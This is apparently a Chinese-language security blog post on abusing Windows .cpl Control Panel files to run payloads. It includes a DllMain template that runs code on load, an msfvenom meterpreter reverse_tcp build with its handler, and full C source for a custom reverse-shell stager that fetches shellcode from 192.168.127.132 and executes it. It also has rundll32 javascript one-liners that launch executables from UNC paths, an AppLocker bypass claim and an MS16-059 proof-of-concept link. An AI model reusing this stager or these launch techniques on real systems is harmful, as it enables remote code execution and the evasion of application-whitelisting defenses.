0x00 前言

---

最近在研究Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)的過程中接觸到了cpl檔案，於是對其做了進一步研究，發現了一些有趣的細節，分享給大家。

0x01 簡介

---

CPL檔案，是Windows控制皮膚擴充套件項，CPL全拼為Control Panel Item
在系統安裝目錄的system32下面有一系列.cpl檔案,它們分別對應著控制皮膚中的專案
CPL檔案本質是Windows可執行性檔案，但不屬於可以直接獨立執行的檔案，通常由shell32.dll開啟

0x02 製作CPL檔案

---

1、檔案特點

本質上是DLL檔案，但有如下特點：

• 字尾名為cpl
• 包含一個匯出函式CPLApplet
• 可雙擊直接執行

2、開啟方式

(1) 雙擊直接執行

(2) cmd下輸入rundll32 shell32.dll,Control_RunDLL <檔名>

(3) cmd下輸入control <檔名>

注：
cmd下rundll32 shell32.dll,Control_RunDLL <檔名>等同於cmd下control <檔名>
control.exe實質呼叫了rundll32.exe，透過control.exe執行cpl檔案的程式為rundll32.exe

(4) 透過指令碼呼叫
a、vbs

#!shell
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")

b、js

#!javascript
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");

3、使用vc 6.0製作標準cpl模板

由檔案特點可知，cpl本質就是一個dll檔案
所以我們可以在vc下建立一個dll的工程，並定義匯出函式為CPlApplet

#!c
LRESULT APIENTRY CPlApplet
(
    HWND    aHwndCPL_in,    // Handle to Configuration Panel window.
    UINT    aUMsg_in,        // CPL message.
    LPARAM    aLParam1_in,    // First message parameter.
    LPARAM  aLParam2_in    // Second message parameter.
) 

值得注意的是aUMsg_in裡面定義了一些CPL相關的引數：

                   | Return            | Return
CPL message        | if successfully   | if not successfully
-------------------+-------------------+--------------------
CPL_INIT           | nonzero           | zero
CPL_GETCOUNT       | nonzero           | zero
CPL_NEWINQUIRE     | zero              | nonzero
CPL_SELECT         | zero              | nonzero
CPL_DBLCLK         | zero              | nonzero
CPL_STOP           | zero              | nonzero
CPL_EXIT           | zero              | nonzero

圖表來自http://www.codeproject.com/Articles/3026/Creating-a-Config-Panel-Applet

CPL_INIT：
進行全域性初始化

CPL_GETCOUNT：
檢索應用程式支援的對話方塊的數目
返回值：支援的對話方塊數目

CPL_NEWINQUIRE：
請求該應用程式支援的對話方塊的請求資訊

CPL_SELECT：
設定當使用者選擇一個對話方塊時顯示的圖示

CPL_DBLCLK：
設定當使用者雙擊一個對話方塊時顯示的圖示

CPL_STOP：
控制皮膚關閉時向每個對話方塊發出的訊息

CPL_EXIT：
釋放記憶體，退出

以上僅對相關函式作簡要介紹，詳細說明可查msdn，提供一個可供參考的工程模板：
http://www.vbforums.com/attachment.php?s=7ebc3a64c985f675615a3e9d0aa350e8&attachmentid=286&d=981822351

注：
函式註釋的語言為斯洛維尼亞語，但不影響我們的程式開發
模板下載後可直接編譯出一個cpl檔案，雙擊正常執行

4、簡單粗暴的方式製作cpl檔案

新建一個標準dll工程，在DLL_PROCESS_ATTACH中新增payload 相關程式碼之下：

#!c
#include "Windows.h"
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            WinExec("cmd", SW_SHOW);
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

編譯後生成的dll檔案字尾名改為cpl即可

如圖

點選後彈出cmd，但是退出後會彈框提示程式相容性問題
如果是管理員許可權的cmd，執行的程式結束後就不會彈框
(此問題的解決方法放在後面介紹)

0x03 測試

---

由以上內容可推斷只要將payload寫在DllMain()函式中，就可以直接修改dll字尾名為cpl，然後透過雙擊來執行
所以自然而然的想到了測試一下meterpreter是否支援這種方式

生成test.cpl：

#!shell
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o test.cpl

msf：

#!shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.132
set LPORT 8888
exploit

雙擊test.cpl後彈回meterpreter shell
但是同樣在退出的時候會彈框提示程式相容性助手

0x04 解決問題

---

1、正常dll執行後彈框

經過測試發現，原有是因為vc6.0的版本低導致的程式相容問題
所以換在vs2008(或者更新的版本)下開發就不會存在這個問題

如圖

2、解決meterpreter彈框的問題

這裡不深入探究msfvenom的生成方式，解決方法為使用c++程式自己編寫一個meterpreter的reverse_tcp版本
關鍵程式碼：

#!c
#include "Windows.h"
#include <WinSock2.h>
#include <stdio.h>  

#pragma comment(lib,"WS2_32.lib")   

int reverse_tcp()
{
    WSADATA wsData;
        if(WSAStartup(MAKEWORD(2,2),&wsData))
        {
            printf("WSAStartp fail.\n");
            return 0;
        } 

        SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0);
        SOCKADDR_IN server;
        ZeroMemory(&server,sizeof(SOCKADDR_IN));
        server.sin_family = AF_INET;
        server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip
        server.sin_port = htons(8888); //server port
        if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server)))
        {
            printf("connect to server fail.\n");
            closesocket(sock);
            WSACleanup();
            return 0;
        } 

        u_int payloadLen;
        if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen))
        {
            printf("recv error\n");
            closesocket(sock);
            WSACleanup();
            return 0;
        } 

        char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        char* buffer = orig_buffer;
        int ret = 0;
        do 
        {
            ret = recv(sock,buffer,payloadLen,0);
            buffer += ret;
            payloadLen -= ret;
        } while (ret > 0 && payloadLen > 0);  


        __asm
        {
            mov edi,sock;   
            jmp orig_buffer; 
        } 

        VirtualFree(orig_buffer,0,MEM_RELEASE);   


}   

BOOL APIENTRY DllMain( HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved
                      )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        reverse_tcp();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

生成dll檔案，字尾名改為cpl
正常執行，正常退出

0x05 Bypass Windows AppLocker

---

之前介紹過《Bypass Windows AppLocker》
開啟預設規則後會攔截exe和指令碼的執行，那麼cpl檔案呢？
當然可以繞過 Windows AppLocker的限制規則

如圖

0x06 rundll32

---

補充一些rundll32呼叫js程式碼的細節;

執行遠端exe,會彈框攔截：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("\\\\127.0.0.1\\c$\\test\\test.exe")

如圖

解決方法：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Exec("\\\\127.0.0.1\\c$\\test\\test.exe")

如圖

執行本地cpl檔案，會彈框提示無法識別檔案字尾名：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("c:\\test\\cpl.cpl")

如圖

解決方法：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c c:\\test\\cpl.cpl",0,true)

遺留問題：

1、無法呼叫Shell.Application直接執行cpl檔案：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new20%ActiveXObject("Shell.Application").ControlPanelItem("c:\\test\\cpl.cpl")

2、無法遠端呼叫cpl檔案

無法識別檔案字尾：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Exec("\\\\127.0.0.1\\c$\\test\\cpl.cpl")

彈框攔截遠端檔案：

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Exec("cmd /c \\\\127.0.0.1\\c$\\test\\cpl.cpl")

and

#!javascript
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd /c \\\\127.0.0.1\\c$\\test\\cpl.cpl",0,true)

如果你有解決辦法或是更好的思路，希望能夠分享，不勝感激。

0x07 Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)

---

下載連結：https://www.exploit-db.com/exploits/39805/

將定製的快捷方式放於任意路徑，本地或是遠端，當使用者訪問此目錄的時候，就會執行payload
演示的遠端路徑為： \\127.0.0.1\c$\test\poc（正常情況下訪問此目錄也會當作遠端目錄被沙盒攔截）

poc演示如圖，訪問遠端目錄 \\127.0.0.1\c$\test\poc並繞過沙盒攔截，成功執行payload